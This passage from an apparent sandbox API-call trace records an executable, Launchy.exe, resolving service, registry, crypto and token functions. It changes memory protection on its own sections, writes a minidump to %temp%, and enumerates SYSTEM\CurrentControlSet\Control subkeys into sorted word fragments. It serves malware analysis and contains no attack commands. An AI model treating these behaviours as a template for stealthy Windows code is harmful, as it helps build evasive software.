lpProcName="FindFirstFileW") returned 0x7733edf0 [0093.113] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryA") returned 0x772e5a80 [0093.114] GetProcAddress (hModule=0x772d0000, lpProcName="LeaveCriticalSection") returned 0x779bb250 [0093.114] GetProcAddress (hModule=0x772d0000, lpProcName="QueryDosDeviceW") returned 0x7733f080 [0093.114] GetProcAddress (hModule=0x772d0000, lpProcName="QueryPerformanceCounter") returned 0x772e5da0 [0093.114] GetProcAddress (hModule=0x772d0000, lpProcName="GetLogicalDriveStringsW") returned 0x7733efb0 [0093.114] GetProcAddress (hModule=0x772d0000, lpProcName="GetDriveTypeW") returned 0x7733eed0 [0093.114] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesW") returned 0x7733ef10 [0093.114] GetProcAddress (hModule=0x772d0000, lpProcName="QueryPerformanceFrequency") returned 0x772e5dc0 [0093.114] GetProcAddress (hModule=0x772d0000, lpProcName="MultiByteToWideChar") returned 0x772e5c40 [0093.115] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileTime") returned 0x7733f140 [0093.115] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileMappingW") returned 0x772e44b0 [0093.115] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempPathW") returned 0x7733eff0 [0093.115] GetProcAddress (hModule=0x772d0000, lpProcName="UnmapViewOfFile") returned 0x772e68f0 [0093.115] GetProcAddress (hModule=0x772d0000, lpProcName="MapViewOfFile") returned 0x772e5be0 [0093.115] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleFileNameW") returned 0x772e5090 [0093.115] GetProcAddress (hModule=0x772d0000, lpProcName="ReadFile") returned 0x7733f090 [0093.116] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileSize") returned 0x7733ef30 [0093.116] GetProcAddress (hModule=0x772d0000, lpProcName="GetWindowsDirectoryW") returned 0x772e5730 [0093.116] GetProcAddress (hModule=0x772d0000, lpProcName="ExpandEnvironmentStringsW") returned 0x772e4a40 [0093.116] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempFileNameW") returned 0x7733efd0 [0093.116] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x756e0000 [0093.116] GetProcAddress (hModule=0x756e0000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x75700940 [0093.117] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyW") returned 0x756ff460 [0093.117] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextW") returned 0x756ffa40 [0093.117] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGenRandom") returned 0x75700730 [0093.117] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0093.117] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthority") returned 0x756ff230 [0093.117] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756fee90 [0093.117] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756fefb0 [0093.118] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthorityCount") returned 0x756ff420 [0093.118] GetProcAddress (hModule=0x756e0000, lpProcName="StartServiceCtrlDispatcherW") returned 0x75700900 [0093.118] GetProcAddress (hModule=0x756e0000, lpProcName="OpenSCManagerW") returned 0x75700540 [0093.118] GetProcAddress (hModule=0x756e0000, lpProcName="SetServiceStatus") returned 0x75700650 [0093.118] GetProcAddress (hModule=0x756e0000, lpProcName="RegDeleteValueW") returned 0x75700580 [0093.118] GetProcAddress (hModule=0x756e0000, lpProcName="DeleteService") returned 0x75712f50 [0093.118] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueExW") returned 0x756ff530 [0093.118] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756fed60 [0093.119] GetProcAddress (hModule=0x756e0000, lpProcName="StartServiceW") returned 0x75703b20 [0093.119] GetProcAddress (hModule=0x756e0000, lpProcName="CloseServiceHandle") returned 0x756ffc00 [0093.119] GetProcAddress (hModule=0x756e0000, lpProcName="ControlService") returned 0x757126d0 [0093.119] GetProcAddress (hModule=0x756e0000, lpProcName="CreateServiceW") returned 0x75712790 [0093.119] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756fe580 [0093.119] GetProcAddress (hModule=0x756e0000, lpProcName="QueryServiceStatusEx") returned 0x756ffac0 [0093.119] GetProcAddress (hModule=0x756e0000, lpProcName="RegEnumKeyW") returned 0x756ff1d0 [0093.119] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x75760000 [0093.120] GetProcAddress (hModule=0x75760000, lpProcName="ShellExecuteExW") returned 0x758c4730 [0093.120] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x753c0000 [0097.837] GetProcAddress (hModule=0x753c0000, lpProcName="CreateStreamOnHGlobal") returned 0x74a02af0 [0097.837] VirtualProtect (in: lpAddress=0x401000, dwSize=0x7967, flNewProtect=0x1d0160, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0097.969] VirtualProtect (in: lpAddress=0x409000, dwSize=0xe76, flNewProtect=0x1d0140, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0097.970] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x658, flNewProtect=0x1d0148, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0097.970] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x4658, flNewProtect=0x1d0140, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0097.971] VirtualProtect (in: lpAddress=0x410000, dwSize=0x944, flNewProtect=0x1d0140, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 0 [0097.972] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0097.973] GetProcessHeap () returned 0x6f0000 [0097.973] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x466c) returned 0x713d90 [0098.159] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff54 | out: lpSystemTimeAsFileTime=0x19ff54*(dwLowDateTime=0xccdfa09d, dwHighDateTime=0x1d63873)) [0098.160] QueryPerformanceFrequency (in: lpFrequency=0x19ff5c | out: lpFrequency=0x19ff5c*=100000000) returned 1 [0098.160] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff4c | out: lpPerformanceCount=0x19ff4c*=19329992896) returned 1 [0098.161] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x254 [0098.161] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0098.161] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x208) returned 0x710780 [0098.161] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x710780, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Launchy.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\launchy.exe")) returned 0x23 [0098.162] StrRChrW (lpStart="C:\\Users\\FD1HVy\\Desktop\\Launchy.exe", lpEnd=0x0, wMatch=0x5c) returned="\\Launchy.exe" [0098.162] lstrlenW (lpString="Launchy.exe") returned 11 [0098.162] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x6fb5d0 [0098.162] PathFindExtensionW (pszPath="Launchy.exe") returned=".exe" [0098.162] StrChrW (lpStart="Launchy", wMatch=0x3a) returned 0x0 [0098.162] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x73e40000 [0101.307] GetProcAddress (hModule=0x73e40000, lpProcName="MiniDumpWriteDump") returned 0x73e1aea0 [0101.913] lstrlenW (lpString="Launchy") returned 7 [0101.914] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x24 [0101.914] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x60) returned 0x700600 [0101.914] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x700600, nSize=0x24 | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x24 [0101.914] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpString2="Launchy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Launchy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Launchy" [0101.914] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Launchy", lpString2=".dmp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Launchy.dmp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Launchy.dmp" [0101.914] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Launchy.dmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\launchy.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x25c [0102.026] SetFilePointer (in: hFile=0x25c, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0102.026] SetEndOfFile (hFile=0x25c) returned 1 [0102.028] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x401af6) returned 0x0 [0102.028] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x19ff80 | out: phkResult=0x19ff80*=0x260) returned 0x0 [0102.028] RegEnumKeyW (in: hKey=0x260, dwIndex=0x0, lpName=0x19fd50, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0102.028] lstrlenW (lpString="ACPI") returned 4 [0102.028] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x6fb3b0 [0102.029] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1, lpName=0x19fd50, cchName=0x104 | out: lpName="AppID") returned 0x0 [0102.030] lstrlenW (lpString="AppID") returned 5 [0102.030] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x6fb4d0 [0102.030] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x12) returned 0x6fb510 [0102.030] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2, lpName=0x19fd50, cchName=0x104 | out: lpName="AppReadiness") returned 0x0 [0102.030] lstrlenW (lpString="AppReadiness") returned 12 [0102.030] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x6fb3d0 [0102.030] lstrcmpW (lpString1="app", lpString2="app") returned 0 [0102.358] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb3d0 | out: hHeap=0x6f0000) returned 1 [0102.358] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x6fbdc8 [0102.359] RegEnumKeyW (in: hKey=0x260, dwIndex=0x3, lpName=0x19fd50, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0102.359] lstrlenW (lpString="Arbiters") returned 8 [0102.359] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x6fbdf0 [0102.359] RegEnumKeyW (in: hKey=0x260, dwIndex=0x4, lpName=0x19fd50, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0102.359] lstrlenW (lpString="BackupRestore") returned 13 [0102.359] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fbf30 [0102.359] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x6fbda0 [0102.359] RegEnumKeyW (in: hKey=0x260, dwIndex=0x5, lpName=0x19fd50, cchName=0x104 | out: lpName="BitLocker") returned 0x0 [0102.359] lstrlenW (lpString="BitLocker") returned 9 [0102.359] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x6fb5f0 [0102.359] lstrcmpW (lpString1="app", lpString2="bit") returned -1 [0102.359] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fbc38 [0102.360] lstrcmpW (lpString1="backup", lpString2="locker") returned -1 [0102.360] RegEnumKeyW (in: hKey=0x260, dwIndex=0x6, lpName=0x19fd50, cchName=0x104 | out: lpName="CI") returned 0x0 [0102.360] lstrlenW (lpString="CI") returned 2 [0102.360] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x12) returned 0x6fb3d0 [0102.360] lstrcmpW (lpString1="id", lpString2="ci") returned 1 [0102.360] RegEnumKeyW (in: hKey=0x260, dwIndex=0x7, lpName=0x19fd50, cchName=0x104 | out: lpName="Class") returned 0x0 [0102.360] lstrlenW (lpString="Class") returned 5 [0102.360] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x6fb530 [0102.360] RegEnumKeyW (in: hKey=0x260, dwIndex=0x8, lpName=0x19fd50, cchName=0x104 | out: lpName="CMF") returned 0x0 [0102.360] lstrlenW (lpString="CMF") returned 3 [0102.360] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x6fb590 [0102.360] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0102.360] lstrcmpW (lpString1="bit", lpString2="cmf") returned -1 [0102.360] RegEnumKeyW (in: hKey=0x260, dwIndex=0x9, lpName=0x19fd50, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0102.360] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0102.360] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x12) returned 0x6fb630 [0102.360] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0102.360] lstrcmpW (lpString1="ci", lpString2="co") returned -1 [0102.360] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fbcb0 [0102.360] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0102.360] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0102.360] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x22) returned 0x708aa0 [0102.360] RegEnumKeyW (in: hKey=0x260, dwIndex=0xa, lpName=0x19fd50, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0102.361] lstrlenW (lpString="COM Name Arbiter") returned 16 [0102.361] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x6fb4b0 [0102.361] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0102.361] lstrcmpW (lpString1="bit", lpString2="com") returned -1 [0102.361] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0102.361] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x6fb550 [0102.361] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0102.361] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x6fbe90 [0102.361] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0102.361] RegEnumKeyW (in: hKey=0x260, dwIndex=0xb, lpName=0x19fd50, cchName=0x104 | out: lpName="CommonGlobUserSettings") returned 0x0 [0102.361] lstrlenW (lpString="CommonGlobUserSettings") returned 22 [0102.361] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fbd00 [0102.361] lstrcmpW (lpString1="backup", lpString2="common") returned -1 [0102.361] lstrcmpW (lpString1="locker", lpString2="common") returned 1 [0102.361] lstrcmpW (lpString1="device", lpString2="common") returned 1 [0102.361] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x6fb610 [0102.361] lstrcmpW (lpString1="acpi", lpString2="glob") returned -1 [0102.361] lstrcmpW (lpString1="name", lpString2="glob") returned 1 [0102.361] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x6fb650 [0102.361] lstrcmpW (lpString1="acpi", lpString2="user") returned -1 [0102.361] lstrcmpW (lpString1="name", lpString2="user") returned -1 [0102.361] lstrcmpW (lpString1="glob", lpString2="user") returned -1 [0102.361] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x6fbd50 [0102.361] lstrcmpW (lpString1="arbiters", lpString2="settings") returned -1 [0102.362] RegEnumKeyW (in: hKey=0x260, dwIndex=0xc, lpName=0x19fd50, cchName=0x104 | out: lpName="Compatibility") returned 0x0 [0102.362] lstrlenW (lpString="Compatibility") returned 13 [0102.362] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x28) returned 0x708c20 [0102.362] RegEnumKeyW (in: hKey=0x260, dwIndex=0xd, lpName=0x19fd50, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0102.362] lstrlenW (lpString="ComputerName") returned 12 [0102.362] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x6fc390 [0102.362] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0102.362] lstrcmpW (lpString1="settings", lpString2="computer") returned 1 [0102.362] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x16) returned 0x6fb570 [0102.362] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0102.362] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0102.362] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fb570 | out: hHeap=0x6f0000) returned 1 [0102.362] RegEnumKeyW (in: hKey=0x260, dwIndex=0xe, lpName=0x19fd50, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0102.362] lstrlenW (lpString="ContentIndex") returned 12 [0102.362] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x6fc3b8 [0102.362] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0102.362] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0102.362] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x6fb5b0 [0102.362] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0102.362] RegEnumKeyW (in: hKey=0x260, dwIndex=0xf, lpName=0x19fd50, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0102.362] lstrlenW (lpString="CrashControl") returned 12 [0102.362] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x6fb570 [0102.363] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0102.363] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0102.363] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x6fc110 [0102.363] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0102.363] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0102.363] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0102.363] RegEnumKeyW (in: hKey=0x260, dwIndex=0x10, lpName=0x19fd50, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0102.363] lstrlenW (lpString="Cryptography") returned 12 [0102.363] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x26) returned 0x708b30 [0102.363] RegEnumKeyW (in: hKey=0x260, dwIndex=0x11, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0102.363] lstrlenW (lpString="DeviceClasses") returned 13 [0102.363] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc318 [0102.363] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0102.363] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0102.363] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0102.363] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc318 | out: hHeap=0x6f0000) returned 1 [0102.363] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1c) returned 0x6fc2f0 [0102.363] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0102.363] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0102.363] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0102.363] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0102.363] RegEnumKeyW (in: hKey=0x260, dwIndex=0x12, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceContainerPropertyUpdateEvents") returned 0x0 [0102.363] lstrlenW (lpString="DeviceContainerPropertyUpdateEvents") returned 35 [0102.364] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc250 [0102.364] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0102.364] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0102.364] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0102.364] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc250 | out: hHeap=0x6f0000) returned 1 [0102.364] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x6fc200 [0102.364] lstrcmpW (lpString1="readiness", lpString2="container") returned 1 [0102.364] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x6fc318 [0102.364] lstrcmpW (lpString1="arbiters", lpString2="property") returned -1 [0102.364] lstrcmpW (lpString1="settings", lpString2="property") returned 1 [0102.364] lstrcmpW (lpString1="computer", lpString2="property") returned -1 [0102.364] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc250 [0102.364] lstrcmpW (lpString1="backup", lpString2="update") returned -1 [0102.364] lstrcmpW (lpString1="locker", lpString2="update") returned -1 [0102.364] lstrcmpW (lpString1="device", lpString2="update") returned -1 [0102.364] lstrcmpW (lpString1="common", lpString2="update") returned -1 [0102.364] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc278 [0102.364] lstrcmpW (lpString1="backup", lpString2="events") returned -1 [0102.364] lstrcmpW (lpString1="locker", lpString2="events") returned 1 [0102.364] lstrcmpW (lpString1="device", lpString2="events") returned -1 [0102.364] lstrcmpW (lpString1="common", lpString2="events") returned -1 [0102.364] lstrcmpW (lpString1="update", lpString2="events") returned 1 [0102.364] RegEnumKeyW (in: hKey=0x260, dwIndex=0x13, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceContainers") returned 0x0 [0102.364] lstrlenW (lpString="DeviceContainers") returned 16 [0102.364] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc138 [0102.364] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0102.364] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0102.364] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0102.365] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc138 | out: hHeap=0x6f0000) returned 1 [0102.365] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x22) returned 0x708a70 [0102.365] lstrcmpW (lpString1="installers", lpString2="containers") returned 1 [0102.365] RegEnumKeyW (in: hKey=0x260, dwIndex=0x14, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceGuard") returned 0x0 [0102.365] lstrlenW (lpString="DeviceGuard") returned 11 [0102.365] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc2c8 [0102.365] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0102.365] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0102.365] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0102.365] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc2c8 | out: hHeap=0x6f0000) returned 1 [0102.365] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x6fb430 [0102.365] lstrcmpW (lpString1="class", lpString2="guard") returned -1 [0102.365] lstrcmpW (lpString1="index", lpString2="guard") returned 1 [0102.365] lstrcmpW (lpString1="crash", lpString2="guard") returned -1 [0102.365] RegEnumKeyW (in: hKey=0x260, dwIndex=0x15, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceMigration") returned 0x0 [0102.365] lstrlenW (lpString="DeviceMigration") returned 15 [0102.365] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc138 [0102.365] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0102.365] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0102.365] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0102.365] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc138 | out: hHeap=0x6f0000) returned 1 [0102.365] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x6fc2a0 [0102.365] lstrcmpW (lpString1="readiness", lpString2="migration") returned 1 [0102.365] lstrcmpW (lpString1="container", lpString2="migration") returned -1 [0102.366] RegEnumKeyW (in: hKey=0x260, dwIndex=0x16, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0102.366] lstrlenW (lpString="DeviceOverrides") returned 15 [0102.366] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc1d8 [0102.366] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0102.366] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0102.366] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0102.366] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x6fc1d8 | out: hHeap=0x6f0000) returned 1 [0102.366] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x6fc138 [0102.366] lstrcmpW (lpString1="readiness", lpString2="overrides") returned 1 [0102.366] lstrcmpW (lpString1="container", lpString2="overrides") returned -1 [0102.366] lstrcmpW (lpString1="migration", lpString2="overrides") returned -1 [0102.366] RegEnumKeyW (in: hKey=0x260, dwIndex=0x17, lpName=0x19fd50, cchName=0x104 | out: lpName="DevQuery") returned 0x0 [0102.366] lstrlenW (lpString="DevQuery") returned 8 [0102.366] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x6fb690 [0102.366] lstrcmpW (lpString1="app", lpString2="dev") returned -1 [0102.366] lstrcmpW (lpString1="bit", lpString2="dev") returned -1 [0102.366] lstrcmpW (lpString1="cmf", lpString2="dev") returned -1 [0102.366] lstrcmpW (lpString1="com", lpString2="dev") returned -1 [0102.366] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x6fb410 [0102.366] lstrcmpW (lpString1="class", lpString2="query") returned -1 [0102.366] lstrcmpW (lpString1="index", lpString2="query") returned -1 [0102.366] lstrcmpW (lpString1="crash", lpString2="query") returned -1 [0102.366] lstrcmpW (lpString1="guard", lpString2="query") returned -1 [0102.366] RegEnumKeyW (in: hKey=0x260, dwIndex=0x18, lpName=0x19fd50, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0102.367] lstrlenW (lpString="Diagnostics") returned 11 [0102.367] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x708b60 [0102.367] RegEnumKeyW (in: hKey=0x260, dwIndex=0x19, lpName=0x19fd50, cchName=0x104 | out: lpName="DmaSecurity") returned 0x0 [0102.367] lstrlenW (lpString="DmaSecurity") returned 11 [0102.367] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x14) returned 0x6fb6b0 [0102.367] lstrcmpW (lpString1="app", lpString2="dma") returned -1 [0102.367] lstrcmpW (lpString1="bit", lpString2="dma") returned -1 [0102.367] lstrcmpW (lpString1="cmf", lpString2="dma") returned -1 [0102.367] lstrcmpW (lpString1="com", lpString2="dma") returned -1 [0102.367] lstrcmpW (lpString1="dev", lpString2="dma") returned -1 [0102.367] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e) returned 0x6fc160 [0102.367] lstrcmpW (lpString1="arbiters", lpString2="security") returned -1 [0102.367] lstrcmpW (lpString1="settings", lpString2="security") returned 1 [0102.367] lstrcmpW (lpString1="computer", lpString2="security") returned -1 [0102.367] lstrcmpW (lpString1="property", lpString2="security") returned -1 [0102.367] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1a, lpName=0x19fd50, cchName=0x104 | out: lpName="EarlyLaunch") returned 0x0 [0102.367] lstrlenW (lpString="EarlyLaunch") returned 11 [0102.367] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x6fb6f0 [0102.367] lstrcmpW (lpString1="class", lpString2="early") returned -1 [0102.367] lstrcmpW (lpString1="index", lpString2="early") returned 1 [0102.367] lstrcmpW (lpString1="crash", lpString2="early") returned -1 [0102.367] lstrcmpW (lpString1="guard", lpString2="early") returned 1 [0102.367] lstrcmpW (lpString1="query", lpString2="early") returned 1 [0102.367] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1a) returned 0x6fc228 [0102.367] lstrcmpW (lpString1="backup", lpString2="launch") returned -1 [0102.368] lstrcmpW (lpString1="locker", lpString2="launch") returned 1 